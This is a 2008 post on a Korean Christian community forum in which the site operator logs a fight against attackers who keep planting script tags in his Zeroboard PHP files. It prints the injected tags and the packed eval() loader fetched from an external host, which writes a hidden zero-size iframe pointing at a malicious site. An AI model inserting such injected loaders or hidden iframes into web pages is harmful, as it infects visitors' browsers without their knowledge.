최신글모든게시글모음 인기글(7일간 조회수높은순서)
m-5.jpg
현재접속자

어여 어서 올라오세요

대청마루(자유게시판)

동네 사람들의 정담이 오고가는 대청마루입니다. 무슨 글이든 좋아요.

2008.1.30 오늘의 전투일지

무엇이든 최용우............... 조회 수 2088 추천 수 0 2008.01.31 01:56:20
.........
홈페이지 하나를 운영하면서 사람들은 잘 모르는 전투를 치열하게 치루고 있습니다.
하도 답답하여 이제부터는 날마다 어떻게 싸우는지 일기 형식으로 공개를 하겠습니다.
그것은 바로 불법 해킹 광고와의 싸움입니다.
다음은 제가 미리네닷컴에 보낸 편지입니다.

1.
누군가가 제로보드의 _head.php을 열고 하단에
[script language="javascript" type="text/javascript" src="icon/view.gif"][ /script]
이런 소스를 심어 놓습니다. 이게 뭔지 궁금하고요.
어떻게 관리자도 아닌데 _head.php을 열고 수정을 할 수 있는지 궁금합니다.
물론 지난 해 12월에 제로보드 lib.php 와 mam...뭐 파일 두개 패치하라고 해서 했습니다.

2.계정 ftp 비밀번호를 바꾸면 관리자모드로 접근하는 것을 막을 수 있을까요?
  아니면 제로보드 관리자 비밀번호를 바꿔야 하나요?
  이렇게 비밀번호를 바꾸는 것이 효과가 있을지 확신이 안 섭니다.

3.일단 계정 ftp의 비밀번호를 현재 **** 에서 *****로 바꾸어 주십시오.
  도메인은 cyw.pe.kr 입니다.

ftp 비밀번호를 해킹해 접속하는 것이라면 ftp 비밀번호를 바꾸면 접속을 못할 것이다.
미리네닷컴에서 ftp 비밀번호를 바꾸어 주었습니다.
그런데 하룻밤 자고 났더니 홈페이지가 무거워져 있었습니다.
점검해 보았더니 새벽 4:10분에 또 _head.php 하단에
[script language="javascript" type="text/javascript" src="icon/view.gif"][/script]
을 심어 놓았네요. 이런 개....

그렇다면 ftp로 들어오는 것이 아닌것 같습니다.
일단 불법 파일 세개를 찾아 지우고 이번에는 제로보드의 관리자 암호를 바꾸어 보기로 하였습니다.
홈페이지 계정에 접근하는 방법은 ftp와 제로보드 관리자 모드이니 두가지 암호를 바꾸면...

수요일이라 수요에배를 드리고 왔더니 또 홈페이지가 느려져 있었습니다.
확인해 보니 lil.php 하단에
[script language="javascript" type="text/javascript" src="http://420.or.kr/css.js"][/script]
을 심어 놓았네요. 이런 개....

이것으로서 제로보드 암호를 바꾼 것도 소용없다는 것이 확인되었습니다.
도대체 이놈들의 정체는 무엇이며 왜 이렇게 계정에 들락거리며 이상한 것을 심어놓는지 모르겠습니다.
그런데 이번에는 파일 세개를 심어놓은 것이 아니라 한개밖에 안 보이네요.
자세히 봤더니 외부에 링크를 걸었군요.
http://420.or.kr에 링크를 걸었는데 여기가 어디인가??? 접속을 해 보니 장애인단체홈페이지네요.
아니 왜 이런곳이 나온다냐? 자세히 보니 장애인 단체에 광고물이 빡빡하게 깔려 있네요.
아마도 불법 게시물에 css 소스를 올려놓고 링크를 한 것 같습니다. http://420.or.kr/css.js를 누르니
드디어 나왔구나css 파일을 txt 파일로 변환하여 소스를 뒤집어 보니

eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('2.3("<1 4=5://6.7.8/9/a.b c=0 d=0>")',14,14,'|iframe|document|write|src|http|www|beijian|com|bbs|check|htm|width|height'.split('|'),0,{}))

오호 드디어 나쁜놈의 시키들이 어디서 오는지 찾았다.
http://www.beijian.com/bbs/check.htm 여기구나
중국놈들이었구나!

아니 그런데 여기가 뭐하는 곳이지?????

댓글 '1'

남순화

2008.02.02 18:22:12

어느날 컴이 갑자기 작동이 느려지고 급기야는 아프다고 딱 서버리는 일이 생겨 컴 닥터를 불렀더니 바이러스에 먹혔다는군요 그런데 한국 바이러스가 아니고 중국 바이러스라며...컴을 가지고 가서 고쳐 오셨습니다 어디로 어떻게 오는지 정말 답답할때가 많지요
List of Articles
번호 제목 글쓴이 날짜 조회 수
5706 광고알림 한국교육복지행정연구원에서 알려드립니다. file 이흥무 2008-02-16 2319
5705 광고알림 절로되는- NCG 전도왕전도 훈련 김창기 2008-02-16 2784
5704 칼럼수필 마귀의 둥지, 성령의 둥지 신영록 2008-02-14 2150
5703 칼럼수필 봉사받는 삶{2}-세례 [1] 신영록 2008-02-14 2067
5702 광고알림 찬양및 교육전도사 모십니다 홍목사 2008-02-13 2161
5701 방명록 눈을 뜨세요. 김목사 2008-02-13 99357
5700 무엇이든 오늘의 예화(26) 복음 2008-02-12 1924
5699 무엇이든 일출 부업짱 2008-02-12 1846
5698 가족글방 국민소득과 행복지수 예종규 2008-02-11 2872
5697 자료공유 열불 나는 일 베스티즈 2008-02-11 2150
5696 무엇이든 지구는 내가 지킨다 최용우 2008-02-06 1658
5695 무엇이든 오늘의 예화(25) 복음 2008-02-06 1780
5694 칼럼수필 봉사 받는 삶{1} [1] 신영록 2008-02-06 1810
5693 방명록 미리 하는 염려는 버려라. 김경배 2008-02-05 34515
5692 무엇이든 겨울철 심각한 소아비만- 아동 자살률 3위(일본사례) !!~ 도우 2008-02-04 2045
5691 방명록 주님은... 김경배 2008-02-04 106333
5690 무엇이든 예수를 위해 살고싶어요~~~~~~~~~~~~~~ 노아 2008-02-03 1849
5689 광고알림 기독교인을 위한 네트영어 프로그램 양부강 2008-02-03 2352
5688 칼럼수필 왜 연합해야 하는가??? 신영록 2008-02-03 1777
5687 무엇이든 대운하반대서명운동에 동참해주세요!!! 운하반대 2008-02-02 1564
5686 방명록 깊음 안에 김경배 2008-02-02 34997
5685 광고알림 외톨이 소녀에서 억대연봉 컨설턴트가 되기까지...-가난을 핑계로 꿈을 버리... file 정은혜 2008-02-01 3050
5684 방명록 가까운 사람에게 잘하기... 김경배 2008-02-01 40889
5683 칼럼수필 아프간 선교사와 욥의 친구들!!! 신영록 2008-01-31 2356
» 무엇이든 2008.1.30 오늘의 전투일지 [1] 최용우 2008-01-31 2088
5681 무엇이든 걸레가 아니었다는...... file 아이비 2008-01-30 2101
5680 가족글방 거들짝신청 했유.. 주원엄마 2008-01-29 3200
5679 광고알림 한국창조과학회 자료 안현순 2008-01-29 1935
5678 방명록 3이라는 숫자 김경배 2008-01-29 35211
5677 칼럼수필 우리가족의 종교 [2] 신영록 2008-01-27 1953
5676 무엇이든 문의사항 악보에대해서 HWANG 2008-01-27 1909
5675 방명록 오해 김경배 2008-01-26 100343
5674 방명록 전심으로 [1] 김경배 2008-01-25 24957
5673 무엇이든 예배중에 기도순서를 맡은 경우 기도문을 작성해서 읽는 것은 아이비 2008-01-24 3109
5672 가족글방 용서의 과정 아이비 2008-01-24 2316
    본 홈페이지는 조건없이 주고가신 예수님 처럼, 조건없이 퍼가기, 인용, 링크 모두 허용합니다.(단, 이단단체나, 상업적, 불법이용은 엄금)
    *운영자: 최용우 (010-7162-3514) * 9191az@hanmail.net * 30083 세종특별시 금남면 용포쑥티2길 5-7 (용포리 53-3)
XE Login